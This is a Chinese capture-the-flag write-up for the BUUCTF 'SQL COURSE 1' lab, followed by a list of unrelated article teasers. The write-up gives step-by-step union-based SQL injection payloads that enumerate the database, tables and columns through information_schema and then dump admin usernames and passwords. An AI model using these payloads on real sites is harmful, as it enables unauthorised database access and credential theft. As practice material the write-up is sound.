BUU SQL COURSE 1

BUU SQL COURSE 1

news2024/11/24 4:32:40

四

发现有登录框，爆破半天也爆破不出来，只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参，sql注入一下试试

前三个都有回显，当id=4的时候页面没有回显了，正好验证了页面有三个新闻

当order by =3的时候又没有回显了，这时可以判断有2个字段

当我们查询显错位的时候，发现页面没有变化，考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database() 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段 ?id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段，我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1289170.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

docker安装及简单使用（Linux版本）

docker安装及简单使用（Linux版本）

文章目录前言一、docker安装二、docker命令pull（安装镜像）images（查看镜像）run（创建容器）删除容器exec（进入运行中的容器）常用命令总结如有启发，可点赞收藏哟~ 前言 ht…

阅读更多...

虚拟人如何在线下活动实现实时交互？动捕设备或为最优解

虚拟人如何在线下活动实现实时交互？动捕设备或为最优解

随着时代的进步，虚拟人凭借其打破时空界限、新颖差异化视觉效果等特点，在发布会、峰会等线下活动中发挥着重要作用，想要实现虚拟人在线下活动中实时交互，使用动捕设备可以让虚拟人化身虚拟主持人、虚拟主播、虚拟舞者演员等。虚拟…

阅读更多...

倒计时5天：SpinalHDL应用前景探索线上研讨会

倒计时5天：SpinalHDL应用前景探索线上研讨会

SpinalHDL是一种开源的高级硬件描述语言，它可以作为VHDL或Verilog的替代，Charles Papon 在2014年创建后，伴随着数年来开源硬件设计的蓬勃发展，在多方面显露出优势，譬如：它专注于高效的硬件描述，…

阅读更多...

【vue】点击导航菜单切换局部页面，打开展示默认栏目，页面刷新等问题

【vue】点击导航菜单切换局部页面，打开展示默认栏目，页面刷新等问题

非专业前端，局限性较高，有些问题看起来很小，但是初次接触很棘手，需要查找很多博客，内容也很杂。以下只是过程中总结下来的，要解决的就是标题中的三个问题。这是我需要达成的效果。 1.第一个是进入导航菜单…

阅读更多...

25道Python练手题（附详细答案），赶紧收藏！Python入门|Python学习

25道Python练手题（附详细答案），赶紧收藏！Python入门|Python学习

题目 1：水仙花数水仙花数（Narcissistic number）也被称为超完全数字不变数（pluperfect digital invariant, PPDI）、自恋数、自幂数、阿姆斯壮数或阿姆斯特朗数（Armstrong number） 水仙花数是指…

阅读更多...

Python版本与opencv版本的对应关系

Python版本与opencv版本的对应关系

python版本要和opencv版本相对应，否则安装的时候会报错。可以到Links for opencv-python上面查看python版本和opencv版本的对应关系，如图，红框内是python版本，绿框内是opencv版本。查看自己的python版本后，使用下面…

阅读更多...

keytool命令使用参考

keytool命令使用参考

Keytool 是一个Java应用程序，用于管理和维护数字证书和密钥。它通过命令行界面提供了一系列的操作，使得用户可以方便地创建、导入、导出和管理密钥库（keystore）中的证书和密钥。以下是关于keytool命令的详细介绍： &…

阅读更多...

#Ts篇:PickOmit协变逆变Partial interface 与 type 有何区别

#Ts篇:PickOmit协变逆变Partial interface 与 type 有何区别

Pick Pick 接受两个类型参数，T 表示要从中选择属性的类型，K 表示选择的属性名的联合类型。通过映射类型，遍历联合类型 K 中的每个属性，然后从类型 T 中选择相应的属性。 type Pick<T, K extends keyof T> {[P in K]: T[P…

阅读更多...

每天一点python——day88

每天一点python——day88

#每天一点Python——88 #编程两大思想【面向过程与面向对象】 #如图： 面向过程的线性思维： 类似于做菜一步步的来，先怎么样怎么样，再怎么样如果不一步步的来，例如先炒菜再点火，这样是做不好的面向对象&a…

阅读更多...

java--匿名内部类

java--匿名内部类

1.匿名内部类 ①就是一种特殊的局部内部类；所谓匿名：指的是程序员不需要为这个类声明名字。 ②特点：匿名内部类本质就是一个子类，并会立即创建出一个子类对象。 ③作用：用于更方便的创建一个子类对象。 2.匿名内部类…

阅读更多...

德迅猎鹰（云蜜罐）有什么用

德迅猎鹰（云蜜罐）有什么用

蜜罐（Honeypot）是一种安全技术，用于吸引和欺骗攻击者，以便收集关于攻击行为的信息和情报。它模拟了一个脆弱的系统、服务或网络资源，看起来对攻击者具有吸引力，但实际上是为了引诱攻击者暴露其攻击手法和意…

阅读更多...

网络安全缓冲区溢出实验

网络安全缓冲区溢出实验

实验要求实验步骤函数 f00()函数 f01()函数 f02() 实验要求 C 程序 homework08.c 的主函数如下： int main(int argc, char * argv[]) { init_buf(Lbuffer, LEN);switch(argc) {case 1: f00(); break;case 2: f01(); break;case 3: f02(); break; default: f00(); …

阅读更多...

算法-贪心思想

算法-贪心思想

贪心的思想非常不好解释，而且越使用权威的语言解释越难懂。而且做题的时候根据自己的理解可能直接做出来，但是非要解释一下怎么使用的贪心的话，就懵圈了。一般来说，贪心的题目没有固定的套路，一题一样，不过…

阅读更多...

高压探头高压衰减棒的使用方法与注意事项

高压探头高压衰减棒的使用方法与注意事项

HVP-15HF高压探头最大量测电压为10kV DC / 7kV AC rms / 20kV p-p。频宽高达40MHz，超低噪声( S/N比 )60dB at 1kHz。搭配转接器PL-10可连接到电表使用。操作方法： 1、先将接地线连接在良好的接地点上。 2、将BNC探头连接在示波器的输入端上。 3、设定…

阅读更多...

【MarginNote教程】MarginNote2思维导图如何用xmind打开

【MarginNote教程】MarginNote2思维导图如何用xmind打开

1. 使用iThoughts打开思维导图 MarginNote2打开需要打印的笔记，左上角分享这里选择iThoughts。iThoughts软件是需要付费，但用iThoughts2go同样可以实现。 (我们提前下载好iThoughts2go) 这里我下载在平板上，图标如图所示 2.进行xmind格式…

阅读更多...

BUU LFI COURSE 1

BUU LFI COURSE 1

二打开链接发现有这么一串php代码阅读发现是GET传参，传入的参数是file 传一下试试页面会报错我们知道了他的路径是在/var/www/html/index.php 这个下面然后想办法返回上一级，就是../ 然后尝试传参一个../不够他的父级目录有好几个&#xff0…

阅读更多...

每天一点python——day87

每天一点python——day87

#每天一点Python——87 #Pycharm程序调试 #例：【我想输出1-10】 i1 while i<10:print(i) #会一直输出1{我想输出一到十，但是他一直输出1}【如果想找到问题出现在什么地方：就需要一步步调试】 #那么怎么调试呢 #前面声明是没有错的&#x…

阅读更多...

【虚拟机】Docker基础【二】【数据卷和挂载本地目录】

【虚拟机】Docker基础【二】【数据卷和挂载本地目录】

2.2.数据卷容器是隔离环境，容器内程序的文件、配置、运行时产生的容器都在容器内部，我们要读写容器内的文件非常不方便。大家思考几个问题： 如果要升级MySQL版本，需要销毁旧容器，那么数据岂不是跟着被销毁了&#x…

阅读更多...

Toolbox零部件调用深度解析

Toolbox零部件调用深度解析

很多时候我们需要用到SOLIDWORKS设计库中的自带零部件，去完成零部件的调用，或者在它上面的基础之上进行更改，来满足我们的使用要求，但似乎并不怎么可行，很多时候更改过的尺寸和调用的规格会自己乱码，下面介…

阅读更多...

if与switch语句的运用—输出成绩

if与switch语句的运用—输出成绩

1.给出一个百分制成绩，要求输出成绩等级A、B、C、D、E。90分以上为A，81-89分为B，70-79分为C，60－69分为D，60分以下为E。 if语句实现 #include <stdio.h> int main() { int score; printf(&qu…

阅读更多...

推荐文章

最新文章